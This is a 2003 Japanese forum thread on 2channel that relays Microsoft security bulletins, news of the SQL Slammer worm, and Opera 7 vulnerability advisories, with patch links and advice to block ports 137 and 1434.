【Windows】セキュリティ情報総合スレッド 2

このエントリーをはてなブックマークに追加
1窓板住人 ◆winDOwS0aE
Windows関連のセキュリティ関連情報、パッチリリース情報等を取り扱います。

前スレ http://pc.2ch.net/test/read.cgi/pcnews/1014872364/l50

関連リンク等(>>2も参照)
☆とにかくPCは適切な設定とこまめなアップデートが肝心。
★初心者・家庭向け★
マイクロソフト製品をより安心してご利用いただくためのホームユーザ向けセキュリティ対策早わかりガイド
http://www.microsoft.com/japan/enable/products/security/default.asp
Microsoft セキュリティスクエア
http://www.microsoft.com/japan/security/square/

★アップデート入手先★
Windows Update
http://windowsupdate.microsoft.com
Office Update
http://office.microsoft.com/japan/ProductUpdates/default.aspx
Microsoftダウンロードセンター
http://www.microsoft.com/downloads/search.aspx?langid=13&displaylang=ja
2窓板住人 ◆winDOwS0aE :03/01/21 16:36 ID:eBmyfoMF
★適切な設定ガイド・確認サイト★
IT Pro技術の広場:スペシャルレポート Windowsに潜むデフォルト設定の落とし穴
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/1/
ぷらら[フレッツ・ADSLセキュリティ対策について]
http://mpw2.plala.or.jp/faq/setsuzoku/internet_setsuzoku/setuzoku_flets-a/security.html
パーソナルセキュリティ研究所
http://210.143.99.143/~p-sec/

★情報源(定番ニュースサイトは除く)★
Microsoft Technet Security Center
http://www.microsoft.com/japan/technet/security/default.asp
Technet ウイルス対策情報
http://www.microsoft.com/japan/technet/security/virus/default.asp
セキュリティ センター : トピック
http://www.microsoft.com/japan/technet/security/topics/default.asp
IPA セキュリティセンター
http://www.ipa.go.jp/security/
セキュリティホールmemo(とその先のリンク)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

★管理者向け★
Technet セキュリティ ツール
http://www.microsoft.com/japan/technet/security/tools/tools.asp
Windows NTを用いた高度セキュリティシステム構築技術調査
http://www.ipa.go.jp/security/fy10/contents/crack/research/windowsnt/windowsnt.html
Windows 2000を用いた高度セキュリティシステム構築技術調査
http://www.ipa.go.jp/security/fy10/contents/crack/research/windows2k/default.htm
3窓板住人 ◆winDOwS0aE :03/01/21 16:38 ID:eBmyfoMF
PCゲームのCDキーを盗み出すトロイの木馬型ウイルス「Trojan.Snag」
http://internet.watch.impress.co.jp/www/article/2003/0121/snag.htm

株式会社シマンテックは、PCゲームのCDキーを盗み出すトロイの木馬型
ウイルス「Trojan.Snag」の情報を公開した。なお、感染力、破壊力ともに低となっている。
4あぼーん:あぼーん
あぼーん
5冷え性インド人:03/01/22 17:26 ID:???
セキュリティホール memoさんからの転載です。

MDAC 2.7 SP1 ですが、インストール時の問題は依然として存在するそうです。
MDAC 2.7 ダウンロードページの記述をよく読んでからインストールしましょう。
O さん情報ありがとうございます。

インストール時の問題とは

このリリースのインストールでは、MDAC がインストールするファイルについて、使用中かどうかの検出を行います。
このフェーズにおいて、対象となるアプリケーションが検出された場合、使用中のアプリケーションの終了を促すダイアログが表示されますが、
そのままインストールを続行することにより、OS の再起動が要求されます。
再起動後、使用中であったファイルは、置き換えが行われます。
しかしながら、再起動後のファイル置き換えの動作に問題があり、
弊社技術情報 JP418820 の問題が発生することが確認されているため、使用中のアプリケーションが検出された場合には、そのアプリケーションを終了させた後で、本リリースのインストールを行ってください。

だそうです。
6むむむ ◆MUMUMUkopk :03/01/22 20:30 ID:???
スレ立て、大変おつでした。

ひどい風邪による体調不良と国内出張と海外出張と発表資料作成が同時に来て
完全に死んでおります。土曜までは身動きとれないです。

で、日曜は既に機中の人。
7名無しさん@お腹いっぱい。:03/01/22 21:35 ID:???
>>1>>6
お疲れさまです
8窓板住人 ◆winDOwS0aE :03/01/23 12:18 ID:Aj3lwe0/
>>6 お大事にです・・・。私も修論がやばかったりしますが。

3件ほどMicrosoftからセキュリティ情報が出てます。
これらは、
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
だそうです。
9窓板住人 ◆winDOwS0aE :03/01/23 12:19 ID:Aj3lwe0/
最新情報は以下のサイトでご確認ください。(ダウンロード先リンクもあります)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-001ov.asp

MS03-001 に関する情報
「MS03-001: Locator Service の未チェックのバッファにより、コードが
実行される (810833)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Locator Service に存在する未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーにお客様のコンピューター上で任意のプログラムが
実行される可能性があります。

影響を受けるソフトウェア
========================
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

Locator Service はネットワーク特有の名前に論理名をマップする
ネームサービスです。これは Windows NT 4.0、Windows 2000 および
Windows XP に同梱されています。既定で、Locator Service は Windows 2000
ドメイン コントローラのみで有効です。
Windows NT 4.0、Windows 2000 ワークステーションおよびメンバ サーバー
および Windows XP では既定で有効ではありません。
10窓板住人 ◆winDOwS0aE :03/01/23 12:19 ID:Aj3lwe0/
修正プログラム
==============
(略・上記最新情報にリンクがあります)

詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。

(緊急) Locator Service に存在する未チェックのバッファにより、
バッファのオーバーラン攻撃が行われる問題です。

対策が行われていないシステムで、この脆弱性を悪用した攻撃 (ワームや
Web サイトで公開された不正なプログラムなど) により被害を受ける可能性が
あります。これらの攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のある
ユーザーにより引き起こされますが、ワームに感染したために悪意の無い
ユーザーが意図せずに攻撃者に転じる事も考えられますので、注意が必要です。
この脆弱性を悪用されることにより、以下のような実害を受ける事が
考えられます。

・ 意図しないアプリケーションが動作させられる可能性があります。
その結果、ワームの感染、データの削除、トロイの木馬の実行などが
考えられます。
・ Locator Service が異常終了されます。
(略)
11窓板住人 ◆winDOwS0aE :03/01/23 12:19 ID:Aj3lwe0/
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-002ov.asp

MS03-002 に関する情報
「MS03-002: Microsoft Content Management Server 用の累積的な
修正プログラム (810487)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる ASP ファイルに
クロスサイト スクリプティングの問題が発生する可能性があります。
最悪の場合、悪意のあるユーザーにより任意のスクリプトが挿入され、
お客様の個人情報や重要な情報が漏洩する可能性があります。

影響を受けるソフトウェア
========================
・ Microsoft Content Management Server 2001

修正プログラム(略)
詳細(略)
12窓板住人 ◆winDOwS0aE :03/01/23 12:20 ID:Aj3lwe0/
最新情報は以下のサイトでご確認ください。(ダウンロードリンクもここにあります)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-003ov.asp

MS03-003 に関する情報
「MS03-003: Outlook 2002 が Version 1 の Exchange Server Security
証明書を処理する方法に存在する問題により、情報が漏えいする (812262)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に電子メールの暗号化の処理に問題があり、
暗号化したはずの電子メールが暗号化されずプレーン テキストで送信される
可能性があります。最悪の場合、電子メールの情報が
漏洩する可能性があります。

影響を受けるソフトウェア
========================
・ Microsoft Outlook 2002

修正プログラム
==============
(略・上記最新情報にリンク先があります)

詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(警告) V1 Exchange Server Security 証明書を使用して電子メールの暗号化の
処理方法に問題があるため、電子メールを適切に暗号化できず、
プレーン テキストで送信する問題です。 (略)
13むむむ ◆MUMUMUkopk :03/01/23 16:30 ID:???
MS03-01〜03が出た模様です。中身はこれから見ます。
14むむむ ◆MUMUMUkopk :03/01/23 16:31 ID:???
>>12
あ、こちらのOpenJaneがおかしかったようですね、、、。
今出先で、ネットワーク不調につき大変失礼しました。
15あぼーん:あぼーん
あぼーん
16名無しさん@お腹いっぱい。:03/01/24 10:25 ID:AGgT5Vt9
MS03-001,MS03-002,MS03-003の詳細な情報が公開され、
MS02-070が更新されています。
MS03-001の最大深刻度は緊急、
MS03-002の最大深刻度は重要、
MS03-003の最大深刻度は警告になっています。十分ご注意ください。
なお、Windows2000において、Q329170は適用するとシャットダウンが
遅くなると言う事例がWindows板周辺で報告されていますので、
以下の情報を把握した上でQ329170の適用の判断を冷静に判断されること
をおすすめします。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070.asp
================================================================
今回の更新内容
このセキュリティ情報のリリース後、このセキュリティ情報で説明された
修正プログラムが Windows XP Service Pack 1 に含まれていないことが
確認されました。この点を反映させ、このセキュリティ情報および修正プログラムを
更新しました。
現在 SMB 署名を有効にして Windows XP Service Pack 1 を実行しているお客様
は、この修正プログラムを適用してください。
================================================================

SMB 署名の問題により、グループ ポリシーが変更される (329170) (MS02-070)

登録日 : 2002/12/12 更新日 : 2003/1/23
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) Windows(R) XP
または Windows 2000 を使用しているシステム管理者。特に Windows 2000 に
関しては、ドメイン コントローラとして使用している場合
17窓板住人:03/01/24 10:26 ID:ch9DV50e
(続き)
脆弱性の影響 : グループ ポリシーの変更
最大深刻度 : 警告
推奨する対応策 : Windows 2000 または Windows XP システムを SMB 署名を
使用するように構成している管理者は直ちに修正プログラムをインストールして
ください。

影響を受けるソフトウェア : Microsoft Windows 2000 Microsoft Windows XP

問題 : 技術的な説明 :
このセキュリティ情報のリリース後に、この脆弱性を排除する修正プログラムが、
Microsoft Windows XP Service Pack 1 に含まれていないことが確認されました。
この事実を反映するためにこのセキュリティ情報を更新し、Windows XP Service
Pack 1 システム上にインストールされるように修正プログラムを更新しました。
現在 SMB 署名を有効にして Windows XP Service Pack 1 を実行しているお客様
は、この修正プログラムを適用してください。
(略)

問題を緩和する要素 : (略)
深刻度 : Windows 2000: 警告     Windows XP: 注意
脆弱性識別番号 : CVE-CAN-2002-1256
テストしたバージョン : (略)
修正プログラム :(略・最新情報のリンク先にあります)
修正プログラムに関する追加情報 : (略)

対象プラットフォーム :
・Windows 2000 用の修正プログラムは Windows 2000 Service Pack 2 または
Service Pack 3 を実行しているシステムにインストールすることができます。
・Windows XP 用の修正プログラムは Windows XP または Windows XP Service
Pack 1 を実行しているシステムにインストールすることができます。
1816も窓板住人:03/01/24 10:27 ID:ch9DV50e
(続き)
この修正を含む予定のサービス パック :(略)
再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)
警告 : なし

詳細情報 :
・よく寄せられる質問 : マイクロソフトセキュリティ情報(MS02-070)
http://www.microsoft.com/japan/technet/security/bulletin/fq02-070.asp
・US マイクロソフトセキュリティ情報(MS02-070)
http://www.microsoft.com/technet/security/bulletin/ms02-070.asp
19窓板住人 ◆winDOwS0aE :03/01/25 18:57 ID:???
ガイシュツですが・・・

どうも、Port 1434/udpに対してDoS攻撃が起きてるようです。
某所では1分間に数千Packetも届いているとか。送信元は不定です。
これは、Microsoft SQL Serverが使用しているポートであり、
MS02-039の脆弱性が存在しています(任意のコードを実行可能です)。
http://www.microsoft.com/japan/technet/security/bulletin/MS02-039.asp
http://www.kb.cert.org/vuls/id/370308
SQL Serverを使用している管理者は至急、脆弱性が存在しないか、攻撃を受けていないか、
乗っ取られていないか、確認してください。

さらに、Port137にも攻撃(あるいはスキャン)が来ているようです。
Port137はMicrosoftのOSでネットワークを構築するときに使用されるポートで、
ユーザ名を含め、コンピュータに関する詳しい情報を入手することが可能です。
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/653
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/885

全ての管理者はPort 137および1434のブロックを推奨します。
対策法に関してはリンク先URLを参照してください。
20窓板住人 ◆winDOwS0aE :03/01/25 23:00 ID:???
>>19 の1434/udpに対するDoS攻撃ですが、ウイルスのようです。
http://securityresponse.symantec.com/avcenter/venc/data/w32.sqlexp.worm.html
W32.SQLExp.Worm
メモリに常駐し、ランダムなIPに対して再び攻撃する、と。
まずはマシンを再起動し、パッチを早急に施し、1434を閉じることを検討してください。
今のところ、メモリにのみ常駐しHDDにウイルスは残さないようです。
21名無しさん@お腹いっぱい。:03/01/25 23:49 ID:???
22名無しさん@お腹いっぱい。:03/01/26 02:49 ID:???
23窓板住人 ◆winDOwS0aE :03/01/26 14:36 ID:???
----------------------------------------------------------------
本情報の内容に変更はありません。
SQL Server 2000 を攻撃するワーム SQL Slammer が流行しておりますため、
本セキュリティ情報を再告知いたします。本セキュリティ修正プログラムを
適用することで感染を防ぐことが出来ます。
SQL Slammer に関する最新の情報は、次のサイトをご覧ください。
http://www.microsoft.com/japan/technet/security/virus/sqlslam.asp
MS02-039 に関する最新の情報は、次のサイトをご覧ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-039.asp
----------------------------------------------------------------

SQL Server 2000 解決サービスのバッファのオーバーランにより、
コードが実行される (Q323875) (MS02-039)

登録日 : 2002/7/25 更新日 : 2002/7/25
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) SQL Server 2000
を使用しているシステム管理者

脆弱性の影響 : 3 つの脆弱性があります。最も深刻な脆弱性については、
攻撃者が影響を受ける SQL Server 2000 がインストールされた環境で制御を
取得する可能性があります。
最大深刻度 : 高
推奨する対応策 : SQL Server 2000 を使用しているお客様は直ちに修正
プログラムをインストールして下さい。

影響を受けるソフトウェア :
・ Microsoft SQL Server 2000 のすべてのエディション
・ Microsoft Desktop Engine (MSDE) 2000
24窓板住人 ◆winDOwS0aE :03/01/26 14:37 ID:???
(続き)
問題 : 技術的な説明 :
SQL Server 2000 では、SQL Server の複数インスタンスを単一のマシンで
ホストする機能を導入しています。各インスタンスは実質上、別のサーバーの
ように動作します。しかし、複数インスタンスには標準の SQL Server
セッション ポート (TCP 1433) を使用できないものもあります。既定の
インスタンスは TCP ポート 1433 をリッスンしますが、名前付きインスタンス
は、それらに割り当てられたポートをリッスンします。SQL Server 解決
サービスは UDP ポート 1434 を使用し、特定の SQL Server インスタンスを
使用するために、適切なネットワーク エンドポイントにクエリを行う方法を
クライアントに提供します。
ここでは 3 つの脆弱性があります。これらのうち 2 つはバッファの
オーバーランの脆弱性です。綿密に作成したパケットを解決サービスに送る
ことにより、攻撃者はシステム メモリの一部 (1 つのケースではヒープ、
もう 1 つのケースではスタックです) を上書きする可能性があります。
ランダム データで上書きされる場合、SQL Server サービスが異常終了し、
綿密に作成されたデータで上書きされる場合、SQL Server サービスの
セキュリティ コンテキストで攻撃者のコードが実行される可能性があります。
3 番目の脆弱性はサービス拒否の脆弱性です。SQL Server は動作中の
インスタンスと停止中のインスタンスを区別するために keep-alive の
メカニズムを使用します。このメカニズムを利用し、解決サービスに特定の
パケットを送ることで、SQL Server 2000 が送信パケットと同じ応答を返す
keep-alive パケットを作成することができます。攻撃者はこのようなパケット
を作成し、ソース アドレスを偽装し、パケットが SQL Server 2000 システム
からのものであるように見せかけ、近くにある SQL Server に送信する可能性が
あります。これにより、2 つのシステムが keep-alive パケット交換を永続的に
行う状態となり、両方のシステムでリソースが消費され、パフォーマンスが
著しく低下します。
25窓板住人 ◆winDOwS0aE :03/01/26 14:37 ID:???
(続き)
問題を緩和する要素 :(略)
深刻度 :
SQL Server 解決サービスのバッファ オーバーラン :
(インターネット サーバー)(イントラネット サーバー)(クライアント システム)
SQL Server 2000
高 高 なし

SQL Server 解決サービスによるサービス拒否 :
(インターネット サーバー)(イントラネット サーバー)(クライアント システム)
SQL Server 2000
高 高 なし

上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : (略)
テストしたバージョン :
マイクロソフトは SQL Server 2000 および 7.0 のテストを行い、これらの
脆弱性による影響を評価しました。それ以前のバージョンに関してはサポート
の対象となっていないため、この脆弱性による影響は不明です。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・ Microsoft SQL Server 2000:
http://download.microsoft.com/download/SQLSVR2000/Patch/Q323875/W98NT42KMeXP/JA/Q323875_SQL2000_SP2_jpn.EXE
26窓板住人 ◆winDOwS0aE :03/01/26 14:38 ID:CwKwbB0b

修正プログラムに関する追加情報 :
対象プラットフォーム : この修正プログラムは SQL Server 2000 Service Pack 2 を
実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック : この問題に対する修正プログラムは
SQL Server 2000 Service Pack 3 に含まれる予定です。

再起動の必要性 : なし。この修正プログラムの適用後、SQL Server サービスのみ
を再起動する必要があります。
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたか確認する方法 :
・ この修正プログラムが正しくインストールされたことを確認するためには、
マイクロソフト サポート技術情報 Q323875 (英語情報) のファイル欄に記載
されているファイルの日付、タイム スタンプを参照して下さい。

警告 : なし
他のセキュリティ修正プログラムの入手先 : (略)
詳細情報 :
・ US マイクロソフトセキュリティ情報(MS02-039)
http://www.microsoft.com/technet/security/bulletin/ms02-039.asp

更新履歴 : 2002/7/25: このセキュリティ情報ページを公開しました。
27名無しさん@お腹いっぱい。:03/01/26 23:46 ID:tidtDq7p
【緊急対策:世界規模のネット障害】原因はSQL Serverのホールか,ユーザーは対策を急げ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030126/1/
28名無しさん@お腹いっぱい。:03/01/27 02:30 ID:hwSH7bxT
SQL Server および MSDE を標的とした SQL Slammer ワームに関する情報
http://www.microsoft.com/japan/technet/security/virus/sqlslam.asp
29窓板住人 ◆winDOwS0aE :03/01/27 23:12 ID:???
>>28 >>23に書いてあるんですけどね(^^;
さて、MS02-061に関する情報が届きました。
-----
================================================================
今回の更新内容
MS02-061 の修正プログラムに、技術情報 317748 で修正された
修正プログラムを統合し、インストーラーを備えた新しい修正
プログラムを公開しました。多分最新情報は以下で参照できます。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-039.asp
================================================================
SQL Server Web タスクで権限が昇格する (Q316333) (MS02-061)

登録日 : 2002/10/16 更新日 : 2003/01/26
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) SQL Server(TM)
7.0、SQL Server 2000、Microsoft Data Engine (MSDE) 1.0 および
SQL Server 2000 Desktop Engine (MSDE 2000) を使用しているシステム管理者

脆弱性の影響 : 権限の昇格
最大深刻度 : 緊急
推奨する対応策 : システム管理者は影響を受けるシステムに修正プログラムを
適用して下さい。

影響を受けるソフトウェア :
・Microsoft SQL Server 7.0 のすべてのエディション
・Microsoft Data Engine (MSDE) 1.0
・Microsoft SQL Server 2000 のすべてのエディション
・SQL Server 2000 Desktop Engine (MSDE 2000)
(MSDE 2000 が含まれている製品のリストは 「よく寄せられる質問」を
ご覧ください)
30窓板住人 ◆winDOwS0aE :03/01/27 23:13 ID:???
問題 : 技術的な説明 :
2002 年 10 月 16 日マイクロソフトは SQL プロシージャーの脆弱性を修正
するために、セキュリティ情報と修正プログラムをリリースしました。その
修正プログラムは現在でもセキュリティの脆弱性と "Slammer" ワームが悪用
した脆弱性を修正するのに有効です。(注意: Slammer ワームは SQL Server
2000、および、 MSDE 2000 に影響します。) しかしながら、セキュリティ
修正プログラムがセキュリティの脆弱性を除去するのに有効でしたが、特定の
状況では問題が発生することが分かりました。その結果、2002 年 10 月 30 日
にその問題を修正する修正プログラム 317748 が必要とされました。
お客様が修正プログラムをインストールする事を簡素化するために、
マイクロソフトは SQL Server 2000 用の修正プログラムを再リリース
しました。SQL Server 2000 の修正プログラムは、お客様のシステムが
"Slammer" ワームの影響を受けないようにするために再度リリース
されました。新しくリリースされた修正プログラムは、このセキュリティ情報
で最初にリリースされたセキュリティの修正プログラムと、技術情報 317748
で報告された SQL Server の問題を修正する修正プログラムを統合します。
再リリースされた新しい SQL Server 用の修正プログラムはインストーラー
付きでパッケージングされました。インストーラーは、システム管理者が
彼らのシステムの SQL Server のファイルを手動でコピーする手順を簡素化
します。マイクロソフトがこの修正プログラムで変更した唯一の変更点は、
更新された修正プログラムと、技術情報 317748 で修正された
修正プログラムを統合し、インストーラーを備えた修正プログラムに
したことです。
31窓板住人 ◆winDOwS0aE :03/01/27 23:13 ID:???
既にお客様が最初に公開された修正プログラムの適用が行われていない
場合には、この更新された修正プログラムを適用していただく事を
お勧めいたします。既にお客様が最初に公開された SQL Server 2000 向けの
セキュリティ修正プログラムと、技術情報 317748 (英語情報) で公開している
修正プログラムを適用している場合には、この更新された修正プログラムを
適用する必要はありません。最初に公開されたセキュリティ修正
プログラムは、Slammer ワームからの防御も含めて SQL Server 2000 を
守ることに効果があります。お客様が最初に公開されたセキュリティ修正
プログラムを適用している場合、技術情報 317748 で述べられている修正
プログラムを適用すべきで、これらはよく寄せられる質問や警告欄にも
書かれています。
2001年1月17日に公開したセキュリティ情報で、 SQL Server 7.0, SQL Server
2000, Microsoft Data Engine (MSDE) および Microsoft Desktop Engine
(MSDE) 2000 用のこの修正以前のすべての修正を含んだ累積的修正
プログラムを公開しました。最初に公開した修正プログラムでは、 新たに
発見された一つの SQL Server のストアドプロシージャの脆弱性を修正
していました。
SQL Server 7.0 および SQL Server 2000 は、1 つの名前で保存され、1 つの
ユニットとして処理される Transact-SQL ステートメントの集合体である
ストアド プロシージャを提供しています。ストアド プロシージャ、
拡張ストアド プロシージャおよびテーブルに対する不適切なアクセス権限の
組み合わせにより、低い権限しか持たないユーザーが Web タスクを実行、
削除、挿入、更新する可能性があります。
SQL Sever に認証された攻撃者は、ほかのユーザーが作成したすべての Web
タスクを削除、挿入、または更新することができます。また攻撃者は、
既に作成されている Web タスクをその Web タスクの作成者のコンテキストで
実行する可能性があります。これは通常 SQL Server エージェント サービス
アカウントのコンテキストで実行されます。
32窓板住人 ◆winDOwS0aE :03/01/27 23:15 ID:???
問題を緩和する要素 :(略)
深刻度 :
SQL Server 7.0 (MSDE 1.0 を含む)緊急
SQL Server 2000 (MSDE 2000 を含む)緊急
脆弱性識別番号 : CAN-2002-1145
テストしたバージョン :(略)
修正プログラム :(略)

修正プログラムに関する追加情報 : 対象プラットフォーム :
・SQL Server 7.0 用の修正プログラムは SQL Server 7.0 Service Pack 4 を
実行しているシステムにインストールすることができます。
・SQL Server 2000 用の修正プログラムは SQL Server 2000 Service Pack 2
を実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック :
これらの問題に対する修正プログラムは SQL Server 2000 Service Pack 3 に
含まれる予定です。

再起動の必要性 :
なし。しかし、SQL Server サービスを再開する必要がある場合があります。
修正プログラムのアンインストール :
ダウンロード可能なパッケージ内の Readme.txt にアンインストールの方法が
含まれています。
修正プログラムに含まれる過去の修正 : この修正プログラムは
マイクロソフト セキュリティ情報 MS02-056 で提供された累積的な修正を
含みます。
33窓板住人 ◆winDOwS0aE :03/01/27 23:15 ID:???
修正プログラムが正しくインストールされたか確認する方法 :
この修正プログラムが正しくインストールされたことを確認するためには、
以下のファイル欄に挙げられているファイルの日付/タイム スタンプを
参照し、各ファイルを確認して下さい。
・SQL Server 7.0: (略)
・SQL Server 2000: (略)

警告 :
・Microsoft Windows NT Server 4.0 Service Pack 6a を実行している場合、
この修正プログラムを適用する前に、マイクロソフト サポート技術情報
JP258437 で説明されているホットフィックスを適用する必要があります。
JP258437 は現在ダウンロードにて入手可能です。詳細はサポート技術情報
JP258437 をご覧ください。
・この累積的な修正プログラムにはマイクロソフト セキュリティ情報
MS02-035 で提供された Killpwd ツールの機能は含まれません。
・この修正プログラムは SQL Server 2000 に含まれる MDAC 及び OLAP 用の
修正プログラムは含んでいません。そのため、MDAC 及び OLAP に対する
セキュリティ修正プログラムに関しては別途適用を行う必要があります。
SQL Server 2000 Service Pack 2 以降にリリースされた SQL Server 2000
に対応した MDAC または OLAP 用の修正プログラムは、次の
セキュリティ情報で説明されている修正プログラムです。
     ・マイクロソフト セキュリティ情報 MS02-030
34窓板住人 ◆winDOwS0aE :03/01/27 23:16 ID:???
・修正プログラムのインストール プロセスは、サーバーの構成によって
異なります。システム管理者は、修正プログラムのパッケージの
Readme.txt ファイルを読み、修正プログラムを正しくインストール
するよう確認してください。
・最初に公開した修正プログラムをすでに適用している場合は、サポート
技術情報 317748 の修正プログラムを適用する場合は、既に適用されている
セキュリティ修正プログラムが削除されないよう、ファイルの上書きの
確認が表示された場合は、"いいえ"を選択する必要があります。
更新したセキュリティ修正プログラムは、この修正を含みます。最初に
公開した修正プログラムは、SQL Server の安定動作に必要な サポート
技術情報 317748 の修正が含まれていない事がわかりました。

他のセキュリティ修正プログラムの入手先 :(略)
詳細情報 :
・よく寄せられる質問 : マイクロソフトセキュリティ情報(MS02-061)
http://www.microsoft.com/japan/technet/security/bulletin/fq02-061.asp
・US マイクロソフトセキュリティ情報(MS02-061)
http://www.microsoft.com/technet/security/bulletin/ms02-061.asp
・サポート技術情報 (KB) 文書番号 : JP316333
[INF] SQL Server 2000 Service Pack 2 のセキュリティ アップデート
http://support.microsoft.com/default.aspx?scid=kb;ja;JP316333
・サポート技術情報 (KB) 文書番号 : JP327068
[INF] SQL Server 7.0 Service Pack 4 のセキュリティ アップデート
http://support.microsoft.com/default.aspx?scid=kb;ja;JP327068
35窓板住人 ◆winDOwS0aE :03/01/27 23:18 ID:???
更新履歴 :
・2002/10/17: このセキュリティ情報ページを公開しました。
・2002/10/24: この問題に対する日本語版 KB を公開しました。
・2003/1/26: インストール機能の付いた修正プログラムを公開しました。
36名無しさん@お腹いっぱい。:03/01/28 01:25 ID:???
>29-35
乙でした
37サンプルコード:03/01/28 01:48 ID:???
38ちんたらもさお:03/01/28 12:55 ID:p7uPEc1l
ここまで読んだ
39むむむ ◆MUMUMUkopk :03/01/29 06:37 ID:???
例のスラマーですが、どうもやばいのはMS製品だけじゃないみたいです。

A list of Microsoft products that contain MSDE 2000:
http://www.microsoft.com/technet/security/MSDEapps.asp

あと、これら↓もやばいらしいです。
Compaq Insight Manager
Crystal Reports Enterprise
Dell OpenManage
HP Openview Internet Services Monitor
McAfee Centralized Virus Admin
McAfee Epolicy Orchestrator
Trend Micro Damage Cleanup Server
Websense Reporter
Veritas Backup Exec
WebBoard Conferencing Server
ISS RealSecure 7.0
ISS Internet Scanner

There are likely many more.
40窓板住人:03/01/29 13:51 ID:???
SQL Server および MSDE を標的とした SQL Slammer ワームに関する情報
http://www.microsoft.com/japan/technet/security/virus/sqlslam.asp
よくある質問と回答
http://www.microsoft.com/japan/technet/security/virus/sqlslamfaq.asp
参考資料
Slammer“サイバーテロ説”は安易だった?
http://www.zdnet.co.jp/news/0301/27/nj00_slammer_symantec.html
41むむむ ◆MUMUMUkopk :03/01/29 20:24 ID:???
こんなのが公開されたので、
今日あたりからスクリプト厨がいろいろしはじめるかもしれんです。

MSSQL2000 Remote UDP Exploit
http://www.securiteam.com/exploits/5FP0N2K8UA.html
42むむむ ◆MUMUMUkopk :03/01/29 20:24 ID:???
ついでにこんなのもありますた。

Outlook Remote Code Execution in Preview Pane (S/MIME, PoC)
http://www.securiteam.com/exploits/5GP0O2K8UO.html
43sarashi hage!!!!!!!!!!!!!!!!!!!!!!:03/02/02 00:34 ID:???
44名無しさん@お腹いっぱい。:03/02/02 18:21 ID:???
>>43
死ね、データベース無断転載基地外厨房
45ちんたらもさお:03/02/04 15:17 ID:nhpiQu3B
ここまでアプデイト済み〜♪
46むむむ ◆MUMUMUkopk :03/02/04 21:37 ID:???
■Opera 7に Highly Vulnerable. な複数のセキュリティホール

http://security.greymagic.com/adv/gm002-op/

# 発表されたばかりだというのに、、、。
47むむむ ◆MUMUMUkopk :03/02/04 21:40 ID:???
>>46
Internet Watch にも出た模様。

■発表されたばかりの「Opera 7」に早くもセキュリティホール

 イスラエルのセキュリティ関連企業GreyMagicは4日、1月28日にリリースされた
ばかりのWebブラウザー「Opera 7 for Windows」正式版に5つのセキュリティ
ホールを発見したと発表した。5つのセキュリティホールのうち3つは、“深刻”な
問題として警告している。

 発見されたセキュリティホールは、ディレクトリーリストやファイル、メールなど
へのフルアクセスを許可してしまうというもの。この問題は、Opera 7が他の
JavaScript搭載ブラウザーとの連携の際に発生する脆弱性などが原因だと
GreyMagicは説明している。
(以上、2003年2月4日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://internet.watch.impress.co.jp/www/article/2003/0204/opera.htm
48むむむ ◆MUMUMUkopk :03/02/04 22:01 ID:???
>>46-47 もう一つ出てた。

Phantom of the Opera.
http://security.greymagic.com/adv/gm003-op/
49むむむ ◆MUMUMUkopk :03/02/05 01:17 ID:???
まだある模様。

Opera Images.
http://security.greymagic.com/adv/gm004-op/
50むむむ ◆MUMUMUkopk :03/02/05 01:19 ID:???
51名無しさん@お腹いっぱい。:03/02/05 13:37 ID:???
俺はOperaより、パッチを当てて気味の悪い機能を全部無効にしたIE+タブブラ
のほうが数段使いやすい
標準で日本語環境がないのも痛いぞ。
52名無しさん@お腹いっぱい。:03/02/05 19:08 ID:???
>>51
Operaはとっくに日本語化されてます。
53名無しさん@お腹いっぱい。:03/02/05 19:10 ID:???
Operaは
・ IEではレジストリをわざわざ弄らないと見れない
 コンテントネゴシエーションでxhtml振り分けをしているサイトを見る時
・ 自分のサイトの確認
程度にしか使わないし(藁

雑談スマソ
54窓板住人:03/02/05 20:24 ID:PACOGToP
Windows WM_TIMER メッセージ処理の問題により、権限が昇格する (328310) (MS02-071)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-071.asp
ですが、

2003/02/04: Windows NT 4.0 および Windows NT 4.0 Terminal Server Edition の特定の
環境において、修正プログラムを適用することにより、問題が発生することが分かりました。
